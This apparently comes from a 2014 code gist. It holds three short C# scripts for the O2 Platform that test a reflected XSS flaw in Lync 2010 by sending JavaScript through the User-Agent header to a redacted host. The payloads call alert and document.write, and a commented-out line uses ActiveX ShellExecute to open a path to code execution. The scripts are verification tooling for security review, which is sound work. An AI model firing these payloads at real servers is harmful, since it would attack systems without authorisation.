Created
May 30, 2014 13:16
Lync 2010 XSS on UserAgent PoCs
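// O2 Platform script: sends one GET request with a chosen User-Agent header and
// shows the raw HTML that comes back, so the reviewer can read how the server
// echoes the header into the page source.
var topPanel = panel.add_Panel(true);
WebClient client = new WebClient();

// Sends `payload` as the User-Agent value and loads the response body into a
// new source-code viewer added to topPanel.
Action<string> sendRequest =
    (payload)=>
        {
            client.Headers.Add("user-agent", payload);
            var codeViewer = topPanel.add_SourceCodeViewer();
            var url = "https://meet.AAAAAA.co.uk";
            string html;
            // using blocks release the response stream and the reader even when
            // the read throws; the original closed them only on the success path.
            using (var stream = client.OpenRead(url))
            using (var reader = new StreamReader(stream))
            {
                html = reader.ReadToEnd();
            }
            // NOTE(review): line 28 is presumably where the response places the
            // header value inside an inline script (the payload below refers to a
            // `diagInfo` assignment) - confirm against the actual response.
            // A fixed server shows the value encoded for a JavaScript string
            // there, with the quote and line break neutralised.
            codeViewer.set_Text(html)
                      .gotoLine(28);
        };

// Baseline request with a harmless marker value, kept for comparison:
//sendRequest("Custom-UserAgent;");
sendRequest("XSS; \"; \r\n alert('xss'); // diagInfo = \"");
return client;

//using System.IO
//using System.Net
//O2Ref:System.Net.dll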
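// O2 Platform script: loads the page in an embedded WebBrowser control with a
// custom User-Agent header and returns the HTML the browser ended up with, so
// the effect of the reflected header can be seen in a rendering engine.
var topPanel = panel.add_Panel(true);
var browser = topPanel.add_WebBrowser();
var payload = "Custom USER AGENT;";
payload += " \"; document.write('<h1>xss</h2>'); //";
// The extra-headers argument is a plain string. The original had a stray `b`
// prefix on this literal, which is not valid C#; the WatiN variant of this PoC
// passes the same header as an ordinary string.
browser.Navigate("https://meet.AAAAAA.co.uk", null, null, "User-Agent: " + payload);
browser.waitForCompleted();
// When the server encodes the header value for its JavaScript context, the
// returned HTML carries no injected heading; seeing it means the value was
// reflected unencoded.
return browser.get_Html();

// from http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header
// in most normal IE configs, the PoC below will throw permission denied
//payload += "var oShell = new ActiveXObject(\"Shell.Application\");oShell.ShellExecute(\"\",\"\",\"\",\"open\",\"1\"); //";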
// O2 Platform script (WatiN variant): opens the page in a WatiN-hosted IE
// control with a custom User-Agent header and returns the resulting HTML.

// Cached alternative; the random suffix in the o2Cache key keeps this object
// unique amongst multiple instances of this control:
//var ie = "ie_inMKo_".o2Cache<WatiN_IE>(()=> panel.clear().add_IE()).silent(true);
var ie = panel.clear().add_IE();

var payload = " \"; document.write('<h1>xss</h2>'); //";
var targetUrl = "https://meet.AAAAAA.co.uk";
// Extra request headers are passed as one string in the fourth argument.
var extraHeaders = "User-Agent: " + payload;
ie.WebBrowser.Navigate(targetUrl, null, null, extraHeaders);
ie.waitForComplete();

// The HTML as IE holds it after load; an injected heading here means the
// header value reached the page without output encoding.
return ie.IE.Html;

//using FluentSharp.Watin;
//O2Ref:FluentSharp.Watin.dll
//O2Ref:WatiN.Core.dll